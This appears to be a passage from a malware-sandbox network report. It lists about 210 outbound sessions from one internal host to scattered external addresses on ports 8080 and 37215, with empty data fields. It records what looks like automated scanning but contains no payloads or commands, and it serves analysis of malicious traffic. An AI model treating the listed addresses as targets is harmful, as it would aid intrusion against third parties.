                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27067192.168.2.2335958157.213.100.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27068192.168.2.23400121.186.5.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27069192.168.2.2346396155.220.216.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27070192.168.2.2339794208.70.82.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27071192.168.2.2340760161.71.90.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27072192.168.2.2339462157.46.53.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27073192.168.2.235489463.178.145.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27074192.168.2.233965627.77.92.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27075192.168.2.2344064183.187.26.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27076192.168.2.235084046.130.83.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27077192.168.2.2345534133.158.145.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27078192.168.2.2347018201.248.23.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27079192.168.2.2352690222.142.103.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27080192.168.2.2356390219.226.28.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27081192.168.2.2340626174.74.132.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27082192.168.2.2351318134.161.159.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27083192.168.2.2345284119.40.93.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27084192.168.2.233319475.104.210.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27085192.168.2.2346408206.151.196.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27086192.168.2.2358458116.249.240.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27087192.168.2.2353364118.137.152.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27088192.168.2.2353968181.141.102.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27089192.168.2.2355776160.119.202.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27090192.168.2.234260074.228.59.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27091192.168.2.233796036.72.138.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27092192.168.2.235319477.28.96.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27093192.168.2.234709417.231.119.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27094192.168.2.2356376180.2.105.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27095192.168.2.235559247.159.10.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27096192.168.2.2351876180.161.34.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27097192.168.2.2348218175.133.135.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27098192.168.2.235826285.232.220.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27099192.168.2.2348586114.64.89.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27100192.168.2.235908024.71.69.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27101192.168.2.2355906209.211.89.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27102192.168.2.2343258201.87.127.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27103192.168.2.234803424.3.240.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27104192.168.2.235438885.3.51.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27105192.168.2.234316270.252.253.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27106192.168.2.234377487.76.172.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27107192.168.2.2347698173.74.56.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27108192.168.2.2357610194.194.125.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27109192.168.2.233378478.148.99.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27110192.168.2.234163883.102.177.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27111192.168.2.235922497.193.131.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27112192.168.2.234431427.149.22.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27113192.168.2.2356920104.227.206.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27114192.168.2.236052627.147.239.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27115192.168.2.2344472174.78.134.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27116192.168.2.2358752182.15.129.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27117192.168.2.2342334157.166.220.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27118192.168.2.2344434195.237.19.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27119192.168.2.233500434.126.57.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27120192.168.2.2345132190.28.113.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27121192.168.2.2347200138.159.187.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27122192.168.2.2340060197.9.3.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27123192.168.2.2360076157.223.69.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27124192.168.2.2349674157.208.87.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27125192.168.2.2342760157.64.1.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27126192.168.2.2352318197.72.60.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27127192.168.2.2357048197.138.255.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27128192.168.2.2341304157.40.254.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27129192.168.2.2342602197.166.104.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27130192.168.2.2356210157.75.43.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27131192.168.2.2360926144.245.40.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27132192.168.2.2345732157.14.134.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27133192.168.2.2356202117.223.0.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27134192.168.2.2357770197.202.109.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27135192.168.2.233679441.144.60.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27136192.168.2.234901070.226.49.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27137192.168.2.2348998197.106.12.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27138192.168.2.2341798197.43.90.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27139192.168.2.234314641.73.5.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27140192.168.2.2347528197.147.195.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27141192.168.2.2334812221.232.88.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27142192.168.2.2344726197.217.94.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27143192.168.2.234818020.15.69.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27144192.168.2.2360022179.199.218.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27145192.168.2.234241041.87.213.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27146192.168.2.2341306157.96.138.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27147192.168.2.2349906157.88.46.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27148192.168.2.2358962197.121.8.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27149192.168.2.2351150197.247.215.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27150192.168.2.233702241.138.134.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27151192.168.2.234011447.140.141.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27152192.168.2.2334578197.128.150.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27153192.168.2.2340882197.253.187.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27154192.168.2.2345586157.59.66.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27155192.168.2.235958841.163.196.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27156192.168.2.235096441.247.35.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27157192.168.2.234903820.157.113.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27158192.168.2.2333816157.124.156.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27159192.168.2.2356464157.94.229.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27160192.168.2.233401441.122.9.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27161192.168.2.2337904197.227.147.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27162192.168.2.2339256120.140.190.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27163192.168.2.235870841.129.77.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27164192.168.2.2354298157.116.114.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27165192.168.2.234944241.5.232.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27166192.168.2.2344216157.143.10.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27167192.168.2.2349400197.194.156.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27168192.168.2.2342824197.170.231.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27169192.168.2.2342376170.111.205.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27170192.168.2.2346762197.118.18.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27171192.168.2.2340348157.147.180.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27172192.168.2.235424841.72.40.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27173192.168.2.233491041.159.71.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27174192.168.2.2343766173.189.148.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27175192.168.2.2340614157.96.21.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27176192.168.2.235463041.149.15.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27177192.168.2.2360182197.186.132.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27178192.168.2.2344190197.131.213.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27179192.168.2.235125441.188.63.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27180192.168.2.2344648157.250.181.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27181192.168.2.2358082157.134.125.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27182192.168.2.2356906157.220.30.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27183192.168.2.233421841.253.46.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27184192.168.2.234606241.38.218.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27185192.168.2.2338266157.85.5.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27186192.168.2.2337688197.77.102.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27187192.168.2.2338166157.144.93.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27188192.168.2.234110257.14.157.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27189192.168.2.2349386102.47.13.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27190192.168.2.2336032208.110.87.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27191192.168.2.234899884.184.222.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27192192.168.2.2352630197.226.45.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27193192.168.2.2358598197.213.36.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27194192.168.2.2354250197.60.92.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27195192.168.2.233412241.230.98.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27196192.168.2.235812641.54.217.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27197192.168.2.234255462.98.106.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27198192.168.2.2347488157.105.199.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27199192.168.2.2338658157.180.242.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27200192.168.2.2347012157.140.86.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27201192.168.2.234066241.127.46.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27202192.168.2.233352841.160.95.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27203192.168.2.2347124157.63.16.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27204192.168.2.2360346151.99.58.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27205192.168.2.2355636197.120.139.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27206192.168.2.2337300157.142.137.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27207192.168.2.2360594157.109.252.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27208192.168.2.2337082197.129.145.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27209192.168.2.2351760157.239.116.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27210192.168.2.2359932157.238.79.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27211192.168.2.2335770197.71.140.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27212192.168.2.233330444.122.216.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27213192.168.2.2334374197.206.211.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27214192.168.2.2333292117.239.238.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27215192.168.2.234488441.247.171.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27216192.168.2.235966241.64.207.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27217192.168.2.2350986197.203.6.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27218192.168.2.235205020.34.33.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27219192.168.2.2344070157.21.63.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27220192.168.2.2345690197.63.16.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27221192.168.2.234742041.58.148.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27222192.168.2.2360684195.134.58.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27223192.168.2.2353658190.221.133.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27224192.168.2.2353484157.81.49.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27225192.168.2.2354528157.6.101.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27226192.168.2.2333200197.76.222.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27227192.168.2.2338236157.158.166.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27228192.168.2.235758841.89.12.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27229192.168.2.2346572157.36.234.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27230192.168.2.234371841.11.30.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27231192.168.2.2334782157.149.101.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27232192.168.2.235011041.153.214.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27233192.168.2.234245041.7.20.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27234192.168.2.235024041.39.175.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27235192.168.2.235097457.209.69.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27236192.168.2.2352464167.135.163.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27237192.168.2.2344464134.63.99.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27238192.168.2.233478641.150.190.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27239192.168.2.2340040204.186.34.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27240192.168.2.234680637.32.20.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27241192.168.2.235429814.67.4.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27242192.168.2.2357478168.54.19.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27243192.168.2.2359056125.215.113.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27244192.168.2.235888487.181.56.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27245192.168.2.234757213.55.36.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27246192.168.2.2349846119.192.53.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27247192.168.2.2334210130.158.183.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27248192.168.2.235886214.150.160.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27249192.168.2.2341846177.75.118.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27250192.168.2.235379672.94.53.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27251192.168.2.2347454184.54.31.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27252192.168.2.2343064171.245.227.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27253192.168.2.234916450.231.63.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27254192.168.2.235156654.136.235.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27255192.168.2.2346662146.74.171.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27256192.168.2.2336336197.237.76.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27257192.168.2.2356350170.160.14.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27258192.168.2.2352476115.149.99.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27259192.168.2.234758844.54.44.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27260192.168.2.235333042.110.106.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27261192.168.2.2350596155.165.118.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27262192.168.2.234651250.95.121.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27263192.168.2.2335920172.164.115.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27264192.168.2.2357342137.10.181.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27265192.168.2.2353822201.4.120.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27266192.168.2.233622044.185.73.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27267192.168.2.233678299.83.123.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27268192.168.2.2337348217.208.213.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27269192.168.2.2346800195.232.207.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27270192.168.2.23434802.65.29.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27271192.168.2.2355922169.153.175.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27272192.168.2.235485049.150.106.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27273192.168.2.235441889.171.26.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27274192.168.2.2353846107.202.13.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27275192.168.2.234215645.207.173.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27276192.168.2.234975472.16.189.698080
                                                        TimestampBytes transferredDirectionData


